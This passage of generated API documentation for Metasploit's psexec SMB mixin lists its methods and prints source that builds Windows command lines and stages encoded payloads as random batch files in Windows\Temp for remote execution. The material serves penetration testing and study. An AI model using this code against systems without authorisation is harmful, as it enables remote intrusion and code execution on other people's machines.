<span class="summary_desc"><div class='inline'>
|
||
<p>Retrieve the SERVICE_DISPLAY_NAME option, generate a random one if not already set.</p>
|
||
</div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#execute_command-instance_method" title="#execute_command (instance method)">#<strong>execute_command</strong>(text, bat, cmd) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#execute_command_payload-instance_method" title="#execute_command_payload (instance method)">#<strong>execute_command_payload</strong>(smbshare) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#execute_command_with_output-instance_method" title="#execute_command_with_output (instance method)">#<strong>execute_command_with_output</strong>(text, bat, cmd, smb_share, r_ip, delay: 0, retries: 0) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#execute_powershell_payload-instance_method" title="#execute_powershell_payload (instance method)">#<strong>execute_powershell_payload</strong> ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#mof_upload-instance_method" title="#mof_upload (instance method)">#<strong>mof_upload</strong>(smb_share) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#native_upload-instance_method" title="#native_upload (instance method)">#<strong>native_upload</strong>(smb_share, filename, service_encoder) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#powershell_installed%3F-instance_method" title="#powershell_installed? (instance method)">#<strong>powershell_installed?</strong>(smb_share, psh_path) ⇒ Boolean </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#psexec-instance_method" title="#psexec (instance method)">#<strong>psexec</strong>(command, disconnect = true) ⇒ Boolean </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'>
|
||
<p>Executes a single windows command.</p>
|
||
</div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#service_description-instance_method" title="#service_description (instance method)">#<strong>service_description</strong> ⇒ String </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'>
|
||
<p>Retrieve the SERVICE_DESCRIPTION option.</p>
|
||
</div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#service_name-instance_method" title="#service_name (instance method)">#<strong>service_name</strong> ⇒ String </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'>
|
||
<p>Retrieve the SERVICE_NAME option, generate a random one if not already set.</p>
|
||
</div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#smb_read_file-instance_method" title="#smb_read_file (instance method)">#<strong>smb_read_file</strong>(smbshare, host, file) ⇒ String<sup>?</sup> </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'>
|
||
<p>Retrieves output from the executed command.</p>
|
||
</div></span>
|
||
|
||
</li>
|
||
|
||
|
||
</ul>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Kerberos/ServiceAuthenticator/Options.html" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options (module)">Kerberos::ServiceAuthenticator::Options</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../Kerberos/ServiceAuthenticator/Options.html#kerberos_auth_options-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_auth_options (method)">#kerberos_auth_options</a></span>, <span class='object_link'><a href="../../Kerberos/ServiceAuthenticator/Options.html#kerberos_clock_skew_seconds-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_clock_skew_seconds (method)">#kerberos_clock_skew_seconds</a></span></p>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Kerberos/Ticket/Storage.html" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage (module)">Kerberos::Ticket::Storage</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../Kerberos/Ticket/Storage.html#kerberos_storage_options-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_storage_options (method)">#kerberos_storage_options</a></span>, <span class='object_link'><a href="../../Kerberos/Ticket/Storage.html#kerberos_ticket_storage-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_ticket_storage (method)">#kerberos_ticket_storage</a></span>, <span class='object_link'><a href="../../Kerberos/Ticket/Storage.html#store_ccache-class_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache (method)">store_ccache</a></span></p>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<h3 class="inherited">Methods included from <span class='object_link'><a href="../Client.html" title="Msf::Exploit::Remote::SMB::Client (module)">Msf::Exploit::Remote::SMB::Client</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../Client.html#connect-instance_method" title="Msf::Exploit::Remote::SMB::Client#connect (method)">#connect</a></span>, <span class='object_link'><a href="../Client.html#domain-instance_method" title="Msf::Exploit::Remote::SMB::Client#domain (method)">#domain</a></span>, <span class='object_link'><a href="../Client.html#domain_username_split-instance_method" title="Msf::Exploit::Remote::SMB::Client#domain_username_split (method)">#domain_username_split</a></span>, <span class='object_link'><a href="../Client.html#smb_create-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_create (method)">#smb_create</a></span>, <span class='object_link'><a href="../Client.html#smb_direct-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_direct (method)">#smb_direct</a></span>, <span class='object_link'><a href="../Client.html#smb_enumprinters-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_enumprinters (method)">#smb_enumprinters</a></span>, <span class='object_link'><a href="../Client.html#smb_enumprintproviders-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_enumprintproviders (method)">#smb_enumprintproviders</a></span>, <span class='object_link'><a href="../Client.html#smb_file_exist%3F-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_file_exist? (method)">#smb_file_exist?</a></span>, <span class='object_link'><a href="../Client.html#smb_file_rm-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_file_rm (method)">#smb_file_rm</a></span>, <span class='object_link'><a href="../Client.html#smb_fingerprint-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_fingerprint (method)">#smb_fingerprint</a></span>, <span class='object_link'><a href="../Client.html#smb_fingerprint_windows_lang-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_fingerprint_windows_lang (method)">#smb_fingerprint_windows_lang</a></span>, <span class='object_link'><a href="../Client.html#smb_fingerprint_windows_sp-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_fingerprint_windows_sp (method)">#smb_fingerprint_windows_sp</a></span>, <span class='object_link'><a href="../Client.html#smb_hostname-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_hostname (method)">#smb_hostname</a></span>, <span class='object_link'><a href="../Client.html#smb_lanman_netshareenumall-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_lanman_netshareenumall (method)">#smb_lanman_netshareenumall</a></span>, <span class='object_link'><a href="../Client.html#smb_login-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_login (method)">#smb_login</a></span>, <span class='object_link'><a href="../Client.html#smb_lookup_share_type-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_lookup_share_type (method)">#smb_lookup_share_type</a></span>, <span class='object_link'><a href="../Client.html#smb_netshareenumall-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_netshareenumall (method)">#smb_netshareenumall</a></span>, <span class='object_link'><a href="../Client.html#smb_netsharegetinfo-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_netsharegetinfo (method)">#smb_netsharegetinfo</a></span>, <span class='object_link'><a href="../Client.html#smb_open-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_open (method)">#smb_open</a></span>, <span class='object_link'><a href="../Client.html#smb_peer_lm-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_peer_lm (method)">#smb_peer_lm</a></span>, <span class='object_link'><a href="../Client.html#smb_peer_os-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_peer_os (method)">#smb_peer_os</a></span>, <span class='object_link'><a href="../Client.html#smb_srvsvc_netshareenumall-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_srvsvc_netshareenumall (method)">#smb_srvsvc_netshareenumall</a></span>, <span class='object_link'><a href="../Client.html#smb_srvsvc_netsharegetinfo-instance_method" title="Msf::Exploit::Remote::SMB::Client#smb_srvsvc_netsharegetinfo (method)">#smb_srvsvc_netsharegetinfo</a></span>, <span class='object_link'><a href="../Client.html#smbhost-instance_method" title="Msf::Exploit::Remote::SMB::Client#smbhost (method)">#smbhost</a></span>, <span class='object_link'><a href="../Client.html#splitname-instance_method" title="Msf::Exploit::Remote::SMB::Client#splitname (method)">#splitname</a></span>, <span class='object_link'><a href="../Client.html#unicode-instance_method" title="Msf::Exploit::Remote::SMB::Client#unicode (method)">#unicode</a></span></p>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Tcp.html" title="Msf::Exploit::Remote::Tcp (module)">Tcp</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../Tcp.html#chost-instance_method" title="Msf::Exploit::Remote::Tcp#chost (method)">#chost</a></span>, <span class='object_link'><a href="../../Tcp.html#cleanup-instance_method" title="Msf::Exploit::Remote::Tcp#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="../../Tcp.html#connect-instance_method" title="Msf::Exploit::Remote::Tcp#connect (method)">#connect</a></span>, <span class='object_link'><a href="../../Tcp.html#connect_timeout-instance_method" title="Msf::Exploit::Remote::Tcp#connect_timeout (method)">#connect_timeout</a></span>, <span class='object_link'><a href="../../Tcp.html#cport-instance_method" title="Msf::Exploit::Remote::Tcp#cport (method)">#cport</a></span>, <span class='object_link'><a href="../../Tcp.html#disconnect-instance_method" title="Msf::Exploit::Remote::Tcp#disconnect (method)">#disconnect</a></span>, <span class='object_link'><a href="../../Tcp.html#handler-instance_method" title="Msf::Exploit::Remote::Tcp#handler (method)">#handler</a></span>, <span class='object_link'><a href="../../Tcp.html#lhost-instance_method" title="Msf::Exploit::Remote::Tcp#lhost (method)">#lhost</a></span>, <span class='object_link'><a href="../../Tcp.html#lport-instance_method" title="Msf::Exploit::Remote::Tcp#lport (method)">#lport</a></span>, <span class='object_link'><a href="../../Tcp.html#peer-instance_method" title="Msf::Exploit::Remote::Tcp#peer (method)">#peer</a></span>, <span class='object_link'><a href="../../Tcp.html#print_prefix-instance_method" title="Msf::Exploit::Remote::Tcp#print_prefix (method)">#print_prefix</a></span>, <span class='object_link'><a href="../../Tcp.html#proxies-instance_method" title="Msf::Exploit::Remote::Tcp#proxies (method)">#proxies</a></span>, <span class='object_link'><a href="../../Tcp.html#replicant-instance_method" title="Msf::Exploit::Remote::Tcp#replicant (method)">#replicant</a></span>, <span class='object_link'><a href="../../Tcp.html#rhost-instance_method" title="Msf::Exploit::Remote::Tcp#rhost (method)">#rhost</a></span>, <span class='object_link'><a href="../../Tcp.html#rport-instance_method" title="Msf::Exploit::Remote::Tcp#rport (method)">#rport</a></span>, <span class='object_link'><a href="../../Tcp.html#set_tcp_evasions-instance_method" title="Msf::Exploit::Remote::Tcp#set_tcp_evasions (method)">#set_tcp_evasions</a></span>, <span class='object_link'><a href="../../Tcp.html#shutdown-instance_method" title="Msf::Exploit::Remote::Tcp#shutdown (method)">#shutdown</a></span>, <span class='object_link'><a href="../../Tcp.html#ssl-instance_method" title="Msf::Exploit::Remote::Tcp#ssl (method)">#ssl</a></span>, <span class='object_link'><a href="../../Tcp.html#ssl_cipher-instance_method" title="Msf::Exploit::Remote::Tcp#ssl_cipher (method)">#ssl_cipher</a></span>, <span class='object_link'><a href="../../Tcp.html#ssl_verify_mode-instance_method" title="Msf::Exploit::Remote::Tcp#ssl_verify_mode (method)">#ssl_verify_mode</a></span>, <span class='object_link'><a href="../../Tcp.html#ssl_version-instance_method" title="Msf::Exploit::Remote::Tcp#ssl_version (method)">#ssl_version</a></span>, <span class='object_link'><a href="../../Tcp.html#sslkeylogfile-instance_method" title="Msf::Exploit::Remote::Tcp#sslkeylogfile (method)">#sslkeylogfile</a></span></p>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../DCERPC.html" title="Msf::Exploit::Remote::DCERPC (module)">DCERPC</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../DCERPC.html#dcerpc_bind-instance_method" title="Msf::Exploit::Remote::DCERPC#dcerpc_bind (method)">#dcerpc_bind</a></span>, <span class='object_link'><a href="../../DCERPC.html#dcerpc_call-instance_method" title="Msf::Exploit::Remote::DCERPC#dcerpc_call (method)">#dcerpc_call</a></span>, <span class='object_link'><a href="../../DCERPC.html#dcerpc_getarch-instance_method" title="Msf::Exploit::Remote::DCERPC#dcerpc_getarch (method)">#dcerpc_getarch</a></span>, <span class='object_link'><a href="../../DCERPC.html#dcerpc_handle-instance_method" title="Msf::Exploit::Remote::DCERPC#dcerpc_handle (method)">#dcerpc_handle</a></span>, <span class='object_link'><a href="../../DCERPC.html#dcerpc_handle_target-instance_method" title="Msf::Exploit::Remote::DCERPC#dcerpc_handle_target (method)">#dcerpc_handle_target</a></span>, <span class='object_link'><a href="../../DCERPC.html#unicode-instance_method" title="Msf::Exploit::Remote::DCERPC#unicode (method)">#unicode</a></span></p>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../DCERPC_LSA.html" title="Msf::Exploit::Remote::DCERPC_LSA (module)">DCERPC_LSA</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../DCERPC_LSA.html#lsa_open_policy-instance_method" title="Msf::Exploit::Remote::DCERPC_LSA#lsa_open_policy (method)">#lsa_open_policy</a></span></p>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../DCERPC_MGMT.html" title="Msf::Exploit::Remote::DCERPC_MGMT (module)">DCERPC_MGMT</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../DCERPC_MGMT.html#dcerpc_mgmt_connect-instance_method" title="Msf::Exploit::Remote::DCERPC_MGMT#dcerpc_mgmt_connect (method)">#dcerpc_mgmt_connect</a></span>, <span class='object_link'><a href="../../DCERPC_MGMT.html#dcerpc_mgmt_inq_if_ids-instance_method" title="Msf::Exploit::Remote::DCERPC_MGMT#dcerpc_mgmt_inq_if_ids (method)">#dcerpc_mgmt_inq_if_ids</a></span>, <span class='object_link'><a href="../../DCERPC_MGMT.html#dcerpc_mgmt_inq_if_stats-instance_method" title="Msf::Exploit::Remote::DCERPC_MGMT#dcerpc_mgmt_inq_if_stats (method)">#dcerpc_mgmt_inq_if_stats</a></span>, <span class='object_link'><a href="../../DCERPC_MGMT.html#dcerpc_mgmt_inq_princ_name-instance_method" title="Msf::Exploit::Remote::DCERPC_MGMT#dcerpc_mgmt_inq_princ_name (method)">#dcerpc_mgmt_inq_princ_name</a></span>, <span class='object_link'><a href="../../DCERPC_MGMT.html#dcerpc_mgmt_is_server_listening-instance_method" title="Msf::Exploit::Remote::DCERPC_MGMT#dcerpc_mgmt_is_server_listening (method)">#dcerpc_mgmt_is_server_listening</a></span>, <span class='object_link'><a href="../../DCERPC_MGMT.html#dcerpc_mgmt_stop_server_listening-instance_method" title="Msf::Exploit::Remote::DCERPC_MGMT#dcerpc_mgmt_stop_server_listening (method)">#dcerpc_mgmt_stop_server_listening</a></span></p>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../DCERPC_EPM.html" title="Msf::Exploit::Remote::DCERPC_EPM (module)">DCERPC_EPM</a></span></h3>
|
||
<p class="inherited"><span class='object_link'><a href="../../DCERPC_EPM.html#dcerpc_endpoint_find_tcp-instance_method" title="Msf::Exploit::Remote::DCERPC_EPM#dcerpc_endpoint_find_tcp (method)">#dcerpc_endpoint_find_tcp</a></span>, <span class='object_link'><a href="../../DCERPC_EPM.html#dcerpc_endpoint_find_udp-instance_method" title="Msf::Exploit::Remote::DCERPC_EPM#dcerpc_endpoint_find_udp (method)">#dcerpc_endpoint_find_udp</a></span>, <span class='object_link'><a href="../../DCERPC_EPM.html#dcerpc_endpoint_list-instance_method" title="Msf::Exploit::Remote::DCERPC_EPM#dcerpc_endpoint_list (method)">#dcerpc_endpoint_list</a></span></p>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<div id="instance_method_details" class="method_details_list">
|
||
<h2>Instance Method Details</h2>
|
||
|
||
|
||
<div class="method_details first">
|
||
<h3 class="signature first" id="display_name-instance_method">
|
||
|
||
#<strong>display_name</strong> ⇒ <tt>String</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
<p>Retrieve the SERVICE_DISPLAY_NAME option, generate a random one if not already set.</p>
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>the display name of the service.</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
52
|
||
53
|
||
54
|
||
55</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 52</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_display_name'>display_name</span>
|
||
<span class='ivar'>@display_name</span> <span class='op'>||=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_DISPLAY_NAME</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='ivar'>@display_name</span> <span class='op'>||=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>16</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="execute_command-instance_method">
|
||
|
||
#<strong>execute_command</strong>(text, bat, cmd) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
241
|
||
242
|
||
243
|
||
244
|
||
245
|
||
246
|
||
247
|
||
248
|
||
249
|
||
250
|
||
251
|
||
252
|
||
253</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 241</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_execute_command'>execute_command</span><span class='lparen'>(</span><span class='id identifier rubyid_text'>text</span><span class='comma'>,</span> <span class='id identifier rubyid_bat'>bat</span><span class='comma'>,</span> <span class='id identifier rubyid_cmd'>cmd</span><span class='rparen'>)</span>
|
||
<span class='comment'># Try and execute the provided command
|
||
</span> <span class='id identifier rubyid_cmd'>cmd</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Post.html" title="Msf::Post (class)">Post</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Post/Windows.html" title="Msf::Post::Windows (module)">Windows</a></span></span><span class='period'>.</span><span class='id identifier rubyid_escape_cmd_literal'><span class='object_link'><a href="../../../../Post/Windows.html#escape_cmd_literal-class_method" title="Msf::Post::Windows.escape_cmd_literal (method)">escape_cmd_literal</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_cmd'>cmd</span><span class='comma'>,</span> <span class='label'>spaces:</span> <span class='kw'>false</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_execute'>execute</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>%COMSPEC% /C echo </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'> ^> %SYSTEMDRIVE%</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_text'>text</span><span class='embexpr_end'>}</span><span class='tstring_content'> > </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_bat'>bat</span><span class='embexpr_end'>}</span><span class='tstring_content'> & %COMSPEC% /C start %COMSPEC% /C </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_bat'>bat</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Executing the command: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_execute'>execute</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='kw'>return</span> <span class='id identifier rubyid_psexec'>psexec</span><span class='lparen'>(</span><span class='id identifier rubyid_execute'>execute</span><span class='rparen'>)</span>
|
||
<span class='kw'>rescue</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC.html" title="Rex::Proto::DCERPC (module)">DCERPC</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC/Exceptions.html" title="Rex::Proto::DCERPC::Exceptions (module)">Exceptions</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/DCERPC/Exceptions/Error.html" title="Rex::Proto::DCERPC::Exceptions::Error (class)">Error</a></span></span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/SMB.html" title="Rex::Proto::SMB (module)">SMB</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/SMB/Exceptions.html" title="Rex::Proto::SMB::Exceptions (module)">Exceptions</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/SMB/Exceptions/Error.html" title="Rex::Proto::SMB::Exceptions::Error (class)">Error</a></span></span><span class='comma'>,</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Error</span><span class='op'>::</span><span class='const'>RubySMBError</span> <span class='op'>=></span> <span class='id identifier rubyid_e'>e</span>
|
||
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>Unable to execute specified command</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>rex</span><span class='tstring_end'>'</span></span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../../../Rex/Logging.html#LEV_3-constant" title="Rex::Logging::LEV_3 (constant)">LEV_3</a></span></span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Unable to execute specified command: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span> <span class='kw'>false</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="execute_command_payload-instance_method">
|
||
|
||
#<strong>execute_command_payload</strong>(smbshare) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
221
|
||
222
|
||
223
|
||
224
|
||
225
|
||
226
|
||
227
|
||
228
|
||
229
|
||
230
|
||
231
|
||
232
|
||
233
|
||
234
|
||
235
|
||
236
|
||
237
|
||
238
|
||
239</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 221</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_execute_command_payload'>execute_command_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_text'>text</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\Windows\\Temp\\</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='op'>..</span><span class='int'>16</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>.txt</span><span class='tstring_end'>"</span></span>
|
||
<span class='id identifier rubyid_bat'>bat</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\Windows\\Temp\\</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='op'>..</span><span class='int'>16</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>.bat</span><span class='tstring_end'>"</span></span>
|
||
<span class='id identifier rubyid_command'>command</span> <span class='op'>=</span> <span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span>
|
||
